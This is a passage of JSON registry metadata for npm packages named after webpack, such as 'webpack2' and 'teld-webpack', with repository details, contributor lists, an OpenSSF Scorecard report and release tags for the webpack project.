api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":416,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack2/codemeta","maintainers":[{"uuid":"luorijin","login":"luorijin","name":null,"email":"947941036@qq.com","url":null,"packages_count":8,"html_url":"https://www.npmjs.com/~luorijin","role":null,"created_at":"2022-11-15T10:40:45.616Z","updated_at":"2022-11-15T10:40:45.616Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/luorijin/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":2435532,"name":"teld-webpack","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jade, coffee, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2017-08-30T07:16:30.317Z","latest_release_published_at":"2017-08-30T07:16:30.317Z","latest_release_number":"0.0.1","last_synced_at":"2026-09-03T01:11:22.978Z","created_at":"2022-04-10T01:45:09.603Z","updated_at":"2026-09-03T01:11:22.978Z","registry_url":"https://www.npmjs.com/package/teld-webpack","install_command":"npm install teld-webpack","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"0.0.1"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webp